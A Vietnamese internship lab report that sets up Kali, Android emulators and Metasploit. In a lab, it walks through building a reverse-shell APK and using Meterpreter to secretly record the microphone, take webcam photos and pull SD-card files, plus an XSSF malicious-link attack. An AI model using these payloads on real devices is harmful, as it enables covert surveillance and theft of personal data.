ATHENA - Nguyen Xuan Ngoc - Giua Ky

50
GVHD : V Đ THNG September 6, 2014 BÁO CÁO ĐỀ TÀI THỰC TẬP ĐỀ TÀI: NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP, SẮP XẾP DỮ LIỆU NHƯ DANH BẠ, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI. GIÁO VIÊN HƯỚNG DẪN: VÕ ĐỖ THẮNG SINH VIÊN THỰC HIỆN: NGUYN XUÂN NGC BÁO CÁO GIỮA KÌ (06/09/2014) Trang 1

description

Báo Cáo Thực Tập ATHENA Tuần 5 :Nghiên cứu các trojan, malware cho phép đánh cắp, sắp xếp dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng android và gửi ra ngoài. KALI LINUX VÀ CÁCH CÀI ĐẶT MÁY ẢO KALI LINUX TRÊN VMWARE WORKSTATION II – NGHIÊN CỨU MALWARE, TROJAN VÀ CƠ CHẾ TẠO MÃ ĐỘC TRÊN ANDROID III – MÁY ẢO ANDROID VIRTUAL DEVICE – CÁCH TẠO MÁY ẢO QUA PHẦN MỀM ECLIPSE IV – MÁY ẢO ANDROID TRÊN PHẦN MỀM GENYMOTION THÔNG QUA VIRTUALBOX V – TẠO MÃ ĐỘC TRÊN MÁY KALI LINUX VÀ TẤN CÔNG VÀO THIẾT BỊ ANDROID: VI – TẤN CÔNG VÀO THIẾT BỊ ANDROID THÔNG QUA LIÊN KẾT CHỨA MÃ ĐỘC

Transcript of ATHENA - Nguyen Xuan Ngoc - Giua Ky

Page 1: ATHENA - Nguyen Xuan Ngoc - Giua Ky

GVHD : VO ĐÔ THĂNG

September 6, 2014

BÁO CÁO ĐỀ TÀI THỰC TẬP

ĐỀ TÀI:

NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP, SẮP XẾP DỮ LIỆU NHƯ DANH BẠ, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI.

GIÁO VIÊN HƯỚNG DẪN: VÕ ĐỖ THẮNG

SINH VIÊN THỰC HIỆN: NGUYÊN XUÂN NGOC

BÁO CÁO GIỮA KÌ

(06/09/2014)

Trang 1

Page 2: ATHENA - Nguyen Xuan Ngoc - Giua Ky

GVHD : VO ĐÔ THĂNG

September 6, 2014

Nội dung:

1. Tên đề tài: Nghiên cứu các trojan, malware cho phép đánh cắp, sắp xếp dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng android và gửi ra ngoài.

2. Yêu cầu: Phần 1: Thực hiện đối với mạng LAN (có kết nối wifi)

1.1 Nghiên cứu hệ điều hành Kali Linux. Cài đặt Kali Linux (hoặc Back Track)1.2 Nghiên cứu cơ chế tạo mã độc trên Kali Linux nói riêng và Android nói

chung.1.3 Nghiên cứu cách tích hợp mã độc vào các phần mềm và quảng bá qua

mạng xã hội.1.4 Thực hiện khai thác data trong thẻ sd card, camera của smartphone.

Phần 2: Thực hiện trên môi trường Virtual Private Server – VPS (server có internet)2.1 Cài đặt autosploit trên VPS2.2 Tạo mã độc trên VPS2.3 Cho phép xâm nhập vào android1, android2, android3… gửi data từ các

android về VPS

Trang 2

Page 3: ATHENA - Nguyen Xuan Ngoc - Giua Ky

GVHD : VO ĐÔ THĂNG

September 6, 2014

I – KALI LINUX VÀ CÁCH CÀI ĐẶT MÁY ẢO KALI LINUX TRÊN VMWARE WORKSTATION

Kali Linux là một hệ điều hành được xây dựng trên nhân Linux, được thiết kế để kiểm tra bảo mật, thử nghiệm xâm nhập các hệ thống máy tính. Kali Linux phát triển trên nền tảng hệ điều hành Debian, khả năng tương thích với kiến trúc ARM được cải tiến, nó hỗ trợ mạng không dây tốt hơn, có khả năng tùy biến cao và dễ dàng nâng cấp giữa các phiên bản Kali trong trương lai.

Các bước để tạo một máy áo chạy Kali Linux trên phần mềm VMware workstation.

1. Chuẩn bị: - Máy tính được cài đặt phầm mềm VMware workstation. Ở đây ta sẽ dùng VMware

workstation 10.0.0- Download file ISO hệ điều hành Kali Linux 64 bit phiên bản 1.0.7 trên link

www.kali.org/downloads

2. Tiến trình: Bước 1: Khởi động VMware. Vào File > New Virtual Machine… (hoặc Ctrl+N)

Bước 2: Chọn Type là Custom (advanced) > Next

Bước 3: Yêu cầu file để cài đặt máy ảo, ta sẽ chọn I will install the operating system later > Next

Trang 3

Page 4: ATHENA - Nguyen Xuan Ngoc - Giua Ky

GVHD : VO ĐÔ THĂNG

September 6, 2014

Bước 4: Chọn hệ thống là Linux, Version là Debian 7 64-bit > Next

Bước 5: Chọn vùng lưu máy ảo và đặt tên máy ảo là Debian 7 64 > Next

Trang 4

Page 5: ATHENA - Nguyen Xuan Ngoc - Giua Ky

GVHD : VO ĐÔ THĂNG

September 6, 2014

Bước 6: Cấu hình bộ xử lý là mặc định > Next

Bước 7: Chọn bộ nhớ RAM là 512MB > Next. Lưu ý là phải phù hợp với máy thật)

Trang 5

Page 6: ATHENA - Nguyen Xuan Ngoc - Giua Ky

GVHD : VO ĐÔ THĂNG

September 6, 2014

Bước 8: Chọn loại Network là Bridged networking > Next

Bước 9: Cấp phát ổ đĩa cho máy ảo. Ta cấp phát Maximum là 15GB. Chọn Store virtual disk as a single file > Next

Trang 6

Page 7: ATHENA - Nguyen Xuan Ngoc - Giua Ky

GVHD : VO ĐÔ THĂNG

September 6, 2014

Bước 10: Ta sẽ trỏ file ISO vào máy ảo vừa tạo. Click chuột phải vào tên máy ảo Debian 7 64 > Settings

Trỏ dòng CD/DVD (IDE) > phần Connection > Use ISO image file > Ta dẫn đến file Kali Linux 64 bit.ISO

Bước 11: Máy ảo được khởi chạy. Tại Boot menu > Chọn Graphical install

Trang 7

Page 8: ATHENA - Nguyen Xuan Ngoc - Giua Ky

GVHD : VO ĐÔ THĂNG

September 6, 2014

Bước 12: Ta chọn Language, Location, Keyboard > ContinueBước 13: Sau đó ta phải cấu hình Network > đặt Hostname > đặt Domain name >

ContinueBước 14: Tạo Users name và Password > Continue. Bước nay khá quan trọng,

root password là mật khẩu để bạn đăng nhập vào máy ảo Debian 7 64

Trang 8

Page 9: ATHENA - Nguyen Xuan Ngoc - Giua Ky

GVHD : VO ĐÔ THĂNG

September 6, 2014

Bước 15: Cấu hình Clock > NextBước 16: Phân vùng ổ đĩa > ta để mặc định Guided – use entire disk > ContinueKhi xuất hiện yêu cầu Write the changes to disk? > chọn Yes > ContinueĐợi Install System

Trang 9

Page 10: ATHENA - Nguyen Xuan Ngoc - Giua Ky

GVHD : VO ĐÔ THĂNG

September 6, 2014

Bước 17: Cấu hình Package manager > Xuất hiện yêu cầu Use the network mirror? > chọn No > Continue

Bước 18: Cài đặt GRUB boot loader > Install the GRUB boot loader to the master boot record? > chọn Yes > Continue

Bước 19: Ta đợi tiến trình cài đặt hoàn tất > Finish the Installation > Continue

Bước 20: Sau khi hoàn tất, máy ảo Debian 7 64 sẽ tự khởi động. Ta đăng nhập với User là root và Password đã đặt.

Trang 10

Page 11: ATHENA - Nguyen Xuan Ngoc - Giua Ky

GVHD : VO ĐÔ THĂNG

September 6, 2014

II – NGHIÊN CỨU MALWARE, TROJAN VÀ CƠ CHẾ TẠO MÃ ĐỘC TRÊN ANDROID

1. Khái niệm Malware , Trojan: - Malware - Malicious Sofware có nghĩa là bất kỳ phần mềm máy tính độc hại nào

đó được tạo nên với ý định xâm nhập làm hại máy tính, thu thập thông tin, truy cập dữ liệu nhạy cảm… mà người sử dụng không hề hay biết. Malware bao gồm virus, worm, trojan horse, adware, spyware, keyloger, backdoor, rootkit…

- Trojan - Trojan Horse gọi là phần mềm gián điệp. Nó là một chương trình phần mềm độc hại mà không cố gắng để tự tái tạo, thay vào đó nó sẽ được cài đặt vào hệ thống của người dùng bằng cách giả vờ là một chương trình phần mềm hợp pháp.

- Hiện nay, malware chỉ xâm nhập vào máy tính và đánh cắp thông tin người dùng, nó chưa có cơ chế lây lan. Cách thức hoạt động của malware giống như trojan chứ không như virus phá hủy.

- Đơn giản là malware và trojan giúp tin tặc truy cập vào máy người dùng, điều khiển từ xa, thu thập thông tin người dùng…

2. Cơ chế hoạt động của Malware : Lấy một ví dụ cụ thể về 1 Malware rất phổ biến trong thời gian vừa qua đó là

Malware DroidDream. Malware này hoạt động qua 2 giai đoạn: - Giai đoạn 1: DroidDream được nhúng vào trong một ứng dụng (số lượng ứng

dụng chứa Malware này hiện đã nhiều hơn 50 ứng dụng) và sẽ chiếm được quyền root vào thiết bị của bạn ngay sau khi bạn chạy ứng dụng đó trong lần sử dụng đầu tiên.

Trang 11

Page 12: ATHENA - Nguyen Xuan Ngoc - Giua Ky

GVHD : VO ĐÔ THĂNG

September 6, 2014

- Giai đoạn 2: Tự động cài đặt một ứng dụng thứ 2 với một permission đặc biệt cho phép quyền uninstall. Một khi các ứng dụng thứ 2 được cài đặt, nó có thể gửi các thông tin nhạy cảm tới một máy chủ từ xa và âm thầm tải thêm các ứng dụng khác Một khi DroidDream chiếm được quyền root, Malware này sẽ chờ đợi và âm thầm cài đặt một ứng dụng thứ hai, DownloadProviderManager.apk như một ứng dụng hệ thống. Việc cài đặt ứng dụng hệ thống này nhằm ngăn ngừa người dùng xem hoặc gỡ bỏ cài đặt các ứng dụng mà không được phép.

Không giống như giai đoạn đầu, người dùng phải khởi động ứng dụng để bắt đầu việc lây nhiễm, ở giai đoạn thứ 2 ứng dụng tự động làm một số việc như là confirm, checkin….Một điều nữa khiến cho bạn không thể biết chúng hoạt động lúc nào, đó là Malware DroidDream này được lập trình để làm hầu hết các công việc của mình vào khoảng thời gian từ 11h đêm tới 8h sáng ngày hôm sau. Đây là khoảng thời gian mà điện thoại ít có khả năng được sử dụng nhất. Điều này làm cho người dùng khó khăn hơn trong việc phát hiện một hành vi bất thường trên chiếc smartphone của mình.

Hiện nay còn có một số Malware còn có khả năng nghe lén tất cả các cuộc điện thoại. Vấn đề này thực sự nguy hiểm khi tất cả các vấn đề riêng tư của chúng ta đang bị một theo dõi, vì vậy những mối nguy hiểm từ mã độc trên android đang thực sự đe dọa đến an sự an toàn của người dùng hệ điều hành này.

3. Cơ chế hoạt động của Trojan :- Trojan có nhiều loại nhưng phổ biến là 2 loại: Trojan dùng để điều khiển và

Trojan dùng để đánh cắp mật khẩu.- Bước đầu cơ chế hoạt động của cả 2 loại này là giống nhau. Máy tính sẽ bị nhiễm

trojan qua tập tin đính kèm của thư điện tử, chương trình trò chơi, chương trình nào đó mà bạn vô tình chạy thử. Nó sẽ tự sao chép vào nơi nào đó trong máy tính. Sau đó nó bắt đầu ghi vào registry của máy các thông số đề nó có thễ tự động khởi chạy khi máy tính khởi động.

- Tiếp theo, đối với trojan điều khiển nó sẽ cho phép tin tặc từ xa nắm quyền điều khiển máy tính. Còn đối với trojan đánh cắp mật khẩu, nó lưu mật khẩu của người dùng vào 1 file và tự động gửi mail đến tin tặc khi máy tính kết nối mạng.

Trang 12

Page 13: ATHENA - Nguyen Xuan Ngoc - Giua Ky

GVHD : VO ĐÔ THĂNG

September 6, 2014

III – MÁY ẢO ANDROID VIRTUAL DEVICE – CÁCH TẠO MÁY ẢO QUA PHẦN MỀM ECLIPSE

Phần mềm Eclipse có chức năng Android Virtual Device cho phép ta tạo máy ảo chạy android (có thể là smartphone, tablet…)

Thông qua các máy ảo này ta có thể nghiên cứu cách tích hợp mã độc vào thiết bị chạy android

1. Các Tools cần thiết để cài đặt: - Phần mềm Eclipse- Bộ Java SE Development Kit- Android Developer Tools- Android SDK- Bộ công cụ Android Debug Bridge ADB- Các ứng dụng cơ bản cho Android

2. Tải và cài đặt JDK – Java SE Development Kit: Bước 1: Tải JDK tại http://www.oracle.com/technetwork/java/javase/downloads/jdk7-downloads-1880260.html

Click chọn “Accept License Agreement”Chọn phiên bản phù hợp với máy tính. Ở đây ta chọn Windows x64

Trang 13

Page 14: ATHENA - Nguyen Xuan Ngoc - Giua Ky

GVHD : VO ĐÔ THĂNG

September 6, 2014

Bước 2: Sauk hi tải về, ta tiến hành cài đặt như nhiều phần mềm khác qua các lựa chọn Next. Cuối cùng click Close

Bước 3: Để kiểm tra lại việc cài đặt JDK. Ta mở cmd.exeGõ lệnh “java <Enter>”

Trang 14

Page 15: ATHENA - Nguyen Xuan Ngoc - Giua Ky

GVHD : VO ĐÔ THĂNG

September 6, 2014

3. Tải về Eclipse Android Developer Tools và Android SDK: Lưu ý khi ta tải về bộ này, sẽ gồm cả phần mềm EclipseBước 1: Tải về tại link http://developer.android.com/sdk/index.html

Click vào I have read and agree… và chọn phiên bản 64-bitClick Download

Bước 2: Giải nén file vừa tải về. Chạy SDK Manager.exeLưu ý là có thể gặp lỗi Fetching https://dl-sll... Failed to fetch… Close

thông báo này lại.Xuất hiển cửa sổ Choose Packages to Install. Nếu cửa sổ này rỗng >

CancelQuay về cửa sổ Android SDK and AVD manager > Settings > Tick vào ô

Force https://...Nếu không bị lỗi này, thì sẽ xuất hiện cửa sổ Android SDK ManagerTa chọn các Packages muốn cài. Và Install

Trang 15

Page 16: ATHENA - Nguyen Xuan Ngoc - Giua Ky

GVHD : VO ĐÔ THĂNG

September 6, 2014

Bước 3: Tại cửa sổ Choose Packages to Install > Tick vào Accept License > Install > Chờ hoàn tất

Trang 16

Page 17: ATHENA - Nguyen Xuan Ngoc - Giua Ky

GVHD : VO ĐÔ THĂNG

September 6, 2014

4. Tích hợp Android SDK vào Eclipse: Sau khi có phần mềm Eclipse và bộ Android SDK, ta cần tích hợp lại để sử dụngBước 1: Mở eclipse.exe trong thư mục giải nén file Eclipse Android Developer Tools và Android SDK đã tải ở trên

D:\ Soft\adt-bundle-windows-x86_64-20140702\eclipse\eclipse.exe

Bước 2: Vào Help > Install new software… > Add> Name: gõ tên tool muốn đặt > Location: gõ địa chỉ tải về ADThttps://dl.google.com/android/eclipsehoặc https://dl-ssl.google.com/android/eclipse > OK

Bước 3: Ở cửa sổ Name > Tick vào Developer Tools

Bước 4: Chọn các Next > Next > Accept > Next > Finish – Run in BackgroundBước 5: Vào Windows > Preferences > Android > Browse > Chỉ đường dẫn thư mục Android SDK đã tải > Apply > OK

Trang 17

Page 18: ATHENA - Nguyen Xuan Ngoc - Giua Ky

GVHD : VO ĐÔ THĂNG

September 6, 2014

Bước 6: Khởi đông lại Eclipse

5. Tạo máy ảo chạy Android trên phần mềm Eclipse: Android Virtual Device là máy ảo cho developer phát triển ứng dụng.Sau đây là các bước tạo 1 AVD trên EclipseBước 1: Mở eclipse.exe > Vào Windows > Android Virtual Device Manager >

Bước 2: Thiết đặt các thông số cần thiết:

Name: Đặt tên cho thiết bị

Trang 18

Page 19: ATHENA - Nguyen Xuan Ngoc - Giua Ky

GVHD : VO ĐÔ THĂNG

September 6, 2014

Device: Chọn loại thiết bị bạn muốn tạoTarget: Chọn phiên bản hệ điều hànhSkin: chọn kích cỡ màn hình bạn muốn, thường thì phải phù hợp với

Device đã chọn ở trênSDcard: chọn thẻ nhớ ảo cho AVD.

Bước 3: Click OK để tạo máy ảo.

Khởi chạy bằng nút Start… > Launch

Bước 4: Chờ hoàn tất, ta được máy ảo chạy Android

Trang 19

Page 20: ATHENA - Nguyen Xuan Ngoc - Giua Ky

GVHD : VO ĐÔ THĂNG

September 6, 2014

IV – MÁY ẢO ANDROID TRÊN PHẦN MỀM GENYMOTION THÔNG QUA VIRTUALBOX

Phần mềm Genymotion và VirtualBox cho phép ta tạo máy ảo chạy android (có thể là smartphone, tablet…).

Thông qua các máy ảo này ta có thể nghiên cứu cách tích hợp mã độc vào thiết bị chạy android.

1. Các Tools cần thiết để cài đặt: - Phần mềm Virtual Box.- Phần mềm Genymotion.- Bộ công cụ phát triển Java SE Development Kit.- Bộ công cụ Android SDK Manager.

2. Tải và cài đặt JDK (Java SE Development Kit) và Android SDK Manager: Phần tải và cài đặt đã được hướng dẫn và thực hiện ở mục III của Báo cáo này.

3. Tải về và cài đặt phần mềm tạo máy ảo VirtualBox: Ta có thể bản VirtualBox phù hợp với máy của bạn.

- Bước 1: Ta tải về file cài đặt VirtualBox tại trang:http://www.oracle.com/technetwork/server-storage/virtualbox/downloads/index.html

Bước 2: Sau khi tải về, ta tiến hành cài đặt như nhiều phần mềm khác:

Trang 20

Page 21: ATHENA - Nguyen Xuan Ngoc - Giua Ky

GVHD : VO ĐÔ THĂNG

September 6, 2014

Bước 3: Next > Next > Next > Install > Finish

Bước 4: Giao diện phần mềm sau khi cài đặt xong.

Trang 21

Page 22: ATHENA - Nguyen Xuan Ngoc - Giua Ky

GVHD : VO ĐÔ THĂNG

September 6, 2014

4. Tải về và cài đặt ứng dụng Genymotion: Bước 1: Trước khi bắt đầu, ta cần có 1 tài khoản trên web www.genymotion.com

Ta có thể đăng ký miễn phí và tải Genymotion về máy.Bước 2: Bắt đầu cài đặt phần mềm Genymotion. Ta lựa chọn ngôn ngữ cài đặt > OK > Next

Bước 3: Chọn thư mục lưu cài đặt.

Bước 4: Next > Next > Install > Finish

Trang 22

Page 23: ATHENA - Nguyen Xuan Ngoc - Giua Ky

GVHD : VO ĐÔ THĂNG

September 6, 2014

Bước 5: Mở Genymotion vừa cài đặt xong. Ta vào thiết đặt 1 số thông số ở mục Settings

Bước 6: Nhập Username và Password mà bạn đã đăng ký trên web www.genymotion.com ở thẻ General

Bước 7: Ở thẻ ADB > chọn Use custom Android SDK tools > Browser đường dẫn đến thư mục sdk trong thư mục mà ta đã tải Android SDK Manager. Sau đó lưu lại cài đặt.

F:\ Soft\adt-bundle-windows-x86_64-20140702\sdk

Trang 23

Page 24: ATHENA - Nguyen Xuan Ngoc - Giua Ky

GVHD : VO ĐÔ THĂNG

September 6, 2014

5. Tạo máy ảo chạy Android trên Genymotion kết hợp VirtualBox:

Bước 1: Ta mở Genymotion lên để tạo máy ảo. Vào Add

Bước 2: Chọn tên thiết bị mà muốn làm máy ảo.

Xuất hiện cấu hình máy ảo sắp tạo:

Trang 24

Page 25: ATHENA - Nguyen Xuan Ngoc - Giua Ky

GVHD : VO ĐÔ THĂNG

September 6, 2014

Bước 3: Next > Đợi máy ảo tự động tải về từ web và Finish quá trình tạo máy ảo.

Bước 4: Để khởi động máy ảo vừa tạo ta chọn máy ảo > Play

Trang 25

Page 26: ATHENA - Nguyen Xuan Ngoc - Giua Ky

GVHD : VO ĐÔ THĂNG

September 6, 2014

Bước 5: Giao diện máy ảo Google Nexus 7 vừa tạo thành công.

Trang 26

Page 27: ATHENA - Nguyen Xuan Ngoc - Giua Ky

GVHD : VO ĐÔ THĂNG

September 6, 2014

V – TẠO MÃ ĐỘC TRÊN MÁY KALI LINUX VÀ TẤN CÔNG VÀO THIẾT BỊ ANDROID:

1. Các công cụ cần thiết:

Để thực hiện tạo mã độc và tấn công vào thiết bị Android ta cần chuẩn bị:

- Máy chạy hệ điều hành Linux phiên bản Kali (hoặc Back Track). Ở đây dùng VMware để tạo máy ảo Kali (đã được hướng dẫn cách làm).

- Thiết bị chạy Android ảo. Ở đây dùng Genymotion kết hợp VirtualBox để tạo tablet chạy Android 4.3.

- Cả 2 thiết bị đều có thể kết nối mạng.- Có tài khoản email để gửi và nhận file trên cả 2 thiết bị.

2. Tiến trình: Bước 1: Khởi động máy tấn công Kali Linux và thiết bị nạn nhân Android.

Thiết đặt card mạng cho máy tấn công Kali để đảm bảo kết nối được internet.

Vào Edit > Virtual Network Editor…

Tại VMnet0 > Chọn Type là Bridged > Chọn card mạng của máy thật ở ô Bridged to.

Trang 27

Page 28: ATHENA - Nguyen Xuan Ngoc - Giua Ky

GVHD : VO ĐÔ THĂNG

September 6, 2014

Bước 3: Kiểm tra IP của máy tấn công Kali bằng lệnh : “ifconfig”

Bước 4: Tạo 1 file chứa mã độc và gửi cho thiết bị Android. Ở đây ta tạo file ứng dụng *.apk và gửi qua email.

Trang 28

Page 29: ATHENA - Nguyen Xuan Ngoc - Giua Ky

GVHD : VO ĐÔ THĂNG

September 6, 2014

Nhập lệnh: “msfpayload android/meterpreter/reverse_tcp lhost=<địa chỉ IP máy tấn công> lport=<địa chỉ port> R > <địa chỉ lưu lại> / <tên file>”Ví dụ lệnh là: msfpayload android/meterpreter/reverse_tcp lhost=192.168.149.136 lport=8080 R > /root/Desktop/appsX.apk.

- Tạo ứng dụng ReverseTCP có trên file là appsX.apk.- Địa chỉ IP máy tấn công là 192.168.149.136.- Địa chỉ Port là 8080 (Lưu ý tránh sử dụng các port thông dụng từ 0 đến 1023).- Lưu file tại Desktop.

Bước 5: Khởi động ứng dụng Metasploit trên máy tấn công Kali bằng lệnh: “msfconsole”

Bước 6: Sau đó ta set các payload, lhost, lport bằng các lệnh:“set payload android/meterpreter/reverse_tcp”“set lhost 192.168.149.136”“set lport 8080”

Trang 29

Page 30: ATHENA - Nguyen Xuan Ngoc - Giua Ky

GVHD : VO ĐÔ THĂNG

September 6, 2014

Bước 7: Thực hiện lệnh “exploit” để bắt đầu quá trình tấn công.

Bước 8: Tại thiết bị Android, sau khi tải về và cài đặt file appsX.apk, ta được ứng dụng MainActivity. Khởi động lên và nhấp vào ReverseTCP.

Trang 30

Page 31: ATHENA - Nguyen Xuan Ngoc - Giua Ky

GVHD : VO ĐÔ THĂNG

September 6, 2014

Khi đó trên Kali ta nhận được thông báo có thiết bị truy cập vào làm nạn nhân.

Bước 9: Dùng lệnh “help” để liệt kê các lệnh mà ta có thể thực hiện được.

Trang 31

Page 32: ATHENA - Nguyen Xuan Ngoc - Giua Ky

GVHD : VO ĐÔ THĂNG

September 6, 2014

3. Khai thác thông tin hê thống: Xem thông tin hệ thống bằng lệnh “sysinfo”.

4. Ghi âm lén: Ghi âm lén ở thiết bị nạn nhân Android và lưu về máy tấn công Kali bằng lệnh

“record_mic”.

File ghi âm được là xLijsRbg.wav lưu tự động ở /root của máy Kali.

5. Khai thác webcam và chụp ảnh lén: Kiểm tra danh sách webcam của thiết bị nạn nhân Android và thực hiện chụp ảnh

lén, lưu về máy tấn công Kali bằng lệnh “webcam_list” và “webcam_snap <mã webcam>”.

Trang 32

Page 33: ATHENA - Nguyen Xuan Ngoc - Giua Ky

GVHD : VO ĐÔ THĂNG

September 6, 2014

File ảnh chụp được là FRumITki.jpeg lưu tự động ở /root của máy Kali .

6. Khai thác file hệ thống của máy nạn nhân: Kiểm tra các file hệ thống đang hoạt động bằng lệnh “ps”.

Trang 33

Page 34: ATHENA - Nguyen Xuan Ngoc - Giua Ky

GVHD : VO ĐÔ THĂNG

September 6, 2014

7. Khai thác dữ liệu từ SDCARD: Di chuyển vào bộ nhớ SDCARD bằng lệnh “cd /sdcard”.Dùng lệnh “ls” để liệt kê danh sách các thư mục/tập tin có trong SDCARD.

Xem các tập tin mà máy nạn nhân đã tải về qua lệnh di chuyển thư muc “cd Download” và lệnh liệt kê “ls”.

Đánh cắp và tải về tập tin bất kì bằng lệnh “download <tên tập tin>”.Ở đây dùng lệnh “download appsX.apk”.

Tập tin appsX.apk vừa đánh cắp về được lưu tự động trong /root của máy tấn công Kali.

8. Kết thúc tấn công: Dùng lệnh “exit” để thoát khỏi Metasploit và kết thúc quá trình tấn công.

Trang 34

Page 35: ATHENA - Nguyen Xuan Ngoc - Giua Ky

GVHD : VO ĐÔ THĂNG

September 6, 2014

VI – TẤN CÔNG VÀO THIẾT BỊ ANDROID THÔNG QUA LIÊN KẾT CHỨA MÃ ĐỘC:

1. Các công cụ cần thiết:

Để tấn công vào thiết bị Android thông qua liên kết chứa mã độc ta cũng cần chuẩn bị như tấn công bằng file mã độc ở trên:

- Máy chạy hệ điều hành Linux phiên bản Kali (hoặc Back Track). Ở đây dùng VMware để tạo máy ảo Kali (đã được hướng dẫn cách làm).

- Thiết bị chạy Android ảo. Ở đây dùng Genymotion kết hợp VirtualBox để tạo tablet chạy Android 4.3.

- Cả 2 thiết bị đều có thể kết nối mạng.- Có tài khoản email để gửi và nhận thông tin liên kết trên cả 2 thiết bị.

2. Tiến trình: Bước 1: Khởi động máy tấn công Kali Linux và thiết bị nạn nhân Android.

Bước 2: Ở máy Kali > Mở Terminal > thực hiện 3 lệnh sau để cập nhật Framework

“msfupdate”

“cd /opt/metasploit/apps/pro/msf3”

“svn export http://xssf.googlecode.com/svn/trunk/ ./ --force”

Bước 3: Khởi động Metasploit bằng lệnh “msfconsole”

Trang 35

Page 36: ATHENA - Nguyen Xuan Ngoc - Giua Ky

GVHD : VO ĐÔ THĂNG

September 6, 2014

Bước 4: Vào XSSF bằng lệnh “load xssf Port=80 Uri=/xssf/ Public=true Mode=Verbose”

Bước 5: Thực hiện lệnh “xssf_urls”

Ta nhận được các urls (đường dẫn web http) như của XSSF Server, XSSF test page, XSSF logs page…

Trang 36

Page 37: ATHENA - Nguyen Xuan Ngoc - Giua Ky

GVHD : VO ĐÔ THĂNG

September 6, 2014

Bước 6: Cho máy nạn nhân truy cập vào đường dẫn XSSF test page: http://192.168.149.136:80/xssf/test.html

Ta nhận được thông báo trên máy tấn công Kali:

3. Kiểm tra số lượng nạn nhân đang truy cập vào đường dẫn mã độc:

Ta dùng lệnh “xssf_victims” để kiểm tra số lượng nạn nhân truy cập vào đường dẫn mã độc http://192.168.149.136:80/xssf/test.html

4. Xem thông tin về nạn nhân đang truy cập: Dùng lệnh “xssf_information <ID máy nạn nhân>”Ở đây ví dụ là “xssf_information 1”

Trang 37

Page 38: ATHENA - Nguyen Xuan Ngoc - Giua Ky

GVHD : VO ĐÔ THĂNG

September 6, 2014

5. Khai thác dữ liệu từ máy nạn nhân: Đầu tiên ta dùng lệnh “search auxiliary/xssf” để kiểm tra các quyền mà ta có

thể thao tác lên máy nạn nhân

Gửi Thông báo XSSF đến máy nạn nhân qua lệnh:“use auxiliary/xssf/public/misc/alert”“run”

Trang 38

Page 39: ATHENA - Nguyen Xuan Ngoc - Giua Ky

GVHD : VO ĐÔ THĂNG

September 6, 2014

Ở máy nạn nhân sẽ nhận được cảnh báo XSSF

Thoát ra msf bằng lệnh “Ctrl+C” > “back” Kiểm tra xem nạn nhân có truy cập vào các trang web thông dụng hay không

bằng lệnh:“use auxiliary/xssf/public/misc/visited_pages”“run”

Cài đặt 1 đường dẫn mới và qua đó kiểm tra thông tin máy nạn nhân lần nữa:“use auxiliary/gather/android_htmlfileprovider”“set SRVPORT 87”“set URIPATH /”“run”

Trang 39

Page 40: ATHENA - Nguyen Xuan Ngoc - Giua Ky

GVHD : VO ĐÔ THĂNG

September 6, 2014

Chờ nạn nhân truy cập vào đường dẫn mới http://192.168.149.136:87/

Ta nhận được thông tin máy nạn nhân:

6. Thoát khỏi XSSF của Metasploit:

Để thoát khỏi ta thực hiện các lệnh: “Ctrl + C” > “back” > “exit” > “exit”

Trang 40

Page 41: ATHENA - Nguyen Xuan Ngoc - Giua Ky

GVHD : VO ĐÔ THĂNG

September 6, 2014

VII – BÁO CÁO TUẦN VÀ VIDEO QUÁ TRÌNH

1. Link báo cáo tuần: http://www.slideshare.net/phanconghien/tuan1 http://www.slideshare.net/phanconghien/tuan2 http://www.slideshare.net/phanconghien/tuan3-4

2. Link video quá trình thực hiện: - Cài đặt Kali Linux trên VMware: - Tạo máy ảo Android Virtual Device trên Eclipse: - Tạo máy ảo Android trên Genymotion và VirtualBox: - Tạo mã độc trên Kali Linux và tấn công vào máy ảo Android: - Tạo mã độc trên trang web bằng XSSF: - Clip Giới thiệu bản thân:

Trang 41

Page 42: ATHENA - Nguyen Xuan Ngoc - Giua Ky

GVHD : VO ĐÔ THĂNG

September 6, 2014

VIII – NGUỒN THAM KHẢO

http://sinhvienit.net/forum

www.kali.org/downloads

http://forum.bkav.com.vn

http://vi.wikipedia.org/wiki

http://developer.android.com/sdk/index.html#download

http://www.oracle.com/technetwork/java/javase/downloads

http://choimobile.vn/forums/#thao-luan-hdh-android.62

http://www.oracle.com/technetwork/server-storage/virtualbox/downloads/index.html http://www.genymotion.com/

http://www.whitehat.vn/threads/

Giáo trình khóa học System Hacking – Trung tâm đào tạo ATHENA – www.Athena.Edu.Vn

Trang 42